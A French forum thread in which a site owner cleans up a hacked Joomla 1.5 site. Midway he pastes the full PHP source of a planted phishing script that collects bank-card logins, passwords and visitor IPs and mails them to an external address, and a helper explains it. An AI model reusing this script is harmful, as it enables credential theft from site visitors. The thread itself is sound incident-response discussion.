Discussion :

[Epistik]

Bonjour,

Tout d'abord je vous explique un tout petit peu la situation...

Le site internet en question a été réalisé il y a un certain temps avec Joomla 1.5....
Or n'ayant jamais été mis à jour, celui-ci à fini par être victime d'attaques.

Comme je ne souhaite pas payer 3000.- pour un nouveau site et que de plus,
je fais quand même des études en informatique, j'ai décidé de m'en occuper moi.

J'espère donc pouvoir compter sur votre aide ! :-)


1ère chose : j'ai fait un premier scan avec sucuri.net dont voici le résultat... http://sitecheck.sucuri.net/results/www.sinanju.ch
Y'a du boulot vous croyez...?

2ème chose : Fichier joint : j'ai trouvé ce fichier (parmi d'autres suspect) ajouté récemment sur le serveur, quelqu'un peut me renseigner sur ce que c'est??
log.php

[cavo789]

Bonjour

Je te suggère d'aller lire la page ci-dessous afin d'avoir un grand nombre d'explication et d'aide qui te permettront de nettoyer ton site :

Votre site a été hacké, que faire ? : http://www.aesecure.com/fr/blog/site-hacke.html

Concernant ta deuxième question, je n'ai pas ouvert le fichier car, très probablement, il est malsain et je n'ai pas envie que mon antivirus hurle

Bonne journée.

[Epistik]

Hello cavo,

Merci pour la piste, je vais donc suivre les conseils qu'ils donnent là-dessus !

Pour ce qui est du fichier, j'aurais dû y penser, effectivement... voici donc le code qu'il contient :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<?

$ip = getenv("REMOTE_ADDR");
$message .= "----------------------------Scotia Result Login---------------------------\n";
$message .= "ScotiaCard: ".$_POST['username']."\n";
$message .= "Password: ".$_POST['password']."\n";
$message .= "IP: ".$ip."\n";
$message .= "---------------Created By WeStGiRl0005------------------------------\n";


$recipient = "1samhigs@gmail.com";
$subject = "TIMBER";
$headers = "From: APP";
$headers .= "MIME-Version: 1.0\n";
mail($cc,$subject,$message,$headers);
	 if (mail($recipient,$subject,$message,$headers))
	   {
		   header("Location: confirm.html");

	   }
else
    	   {
 		echo "ERROR! Please go back and try again.";
  	   }

?>

[cavo789]

Ce fichier génère un mail envoyé à une adresse email (mentionnée dans le code).

Elle récupère l'IP de ton visiteur et tente de récupérer son login et mot de passe. Je dis tente car cela n'aboutira jamais sous Joomla qui est mieux sécurisé que ce croît ce code php vraiment idiot et ridicule. Tu peux sans crainte le supprimer; il n'a rien transmis de vraiment important; juste ennuyeux mais c'est tout.

Note que maintenant, vu que ce fichier a pû être déposé, c'est donc que ton site est failible ==> cherche par où le gars est rentré (le log des accès Apache est une source d'information) et sécurise ton site.

Tu trouveras quantité de conseils dans le document que j'ai mentionné plus haut.

Bonne chasse aux portes ouvertes et bonne soirée.

[Epistik]

Bonjour,

Je peine à remettre mon site en état mais j'ai pu récupérer à peu près tous les textes des articles.
Je pensais donc faire au plus simple ; tout effacer et repartir à zéro en installant Joomla 2.5.

Seulement je voulais encore savoir s'il serait possible de récupérer le Template (j'imagine que oui) de mon site précédent et comment ?!

[cavo789]

Seulement je voulais encore savoir s'il serait possible de récupérer le Template (j'imagine que oui) de mon site précédent et comment ?!

Tu copies le dossier /templates/ton_template du site virusé vers le nouveau puis tu vas dans l'administration de Joomla -> Extensions -> Installer et tu fais un "découvrir".

Maintenant soit bien conscient que lorsqu'un site Joomla est virusé, c'est la plupart du temps dans le dossier /template/ton_template que se trouve la bestiole.

Le mieux serait de récupérer une version propre et saine de ton template.

[Epistik]

Alors dans mon dossier /templates, j'ai :

• Index.html
• system
• nomTemplate
• ancien-nomTemplate

Or quand j'accède à "nomTemplate", j'obtiens :
Réponse : 550 Can't change directory to omTemplate: Permission denied
Erreur : Impossible de récupérer le contenu du dossier
Saurais-tu comment cela est possible? Le dossier est-il simplement inexistant ?

Par contre je pense que l'ancien est sain, donc j'essayerai avec celui-là !

Je profite encore de poser un autre question : À l'installation de Joomla, il faut entrer le nom et les accès à la base de donnée du serveur. Or je ne les connais pas, est-ce possible de les retrouver sans devoir demander à l'hébergeur ??

Merci pour toute ton aide jusque-là !

[cavo789]

Réponse : 550 Can't change directory to omTemplate: Permission denied
Erreur : Impossible de récupérer le contenu du dossier
Saurais-tu comment cela est possible? Le dossier est-il simplement inexistant ?

Vérifie tes chmods (permissions du dossier). Tu devrais avoir 755. Si ce n'est pas le cas, adapte.

Par contre je pense que l'ancien est sain, donc j'essayerai avec celui-là !

Tu "penses" ou tu es sûr ? Parce que je te garantis que les hackeurs attaquent systématiquement le dossier templates.

Je profite encore de poser un autre question : À l'installation de Joomla, il faut entrer le nom et les accès à la base de donnée du serveur. Or je ne les connais pas, est-ce possible de les retrouver sans devoir demander à l'hébergeur ??

Non, il faut demander. C'est un minimum à avoir pour installer un CMS; Joomla! ou pas.

Bonne journée.

[Epistik]

Pfiouh! Après quelques efforts, j'ai récupéré tous les accès nécessaires.

Mais un problème persiste : j'ai un répertoire inatteignable dans le dossier "Templates". Le chmod est à 00 et si je tente de modifier ça j'obtiens :

Impossible d'exécuter la commande chmod 0444 /web/templates/nomDuTemplate. Remarque : les commandes CHMOD sont uniquement possibles sur les serveurs FTP Unix, non sur les serveurs FTP Windows

Une idée ??

[Epistik]

Mon site est en ligne ! Merci pour l'aide !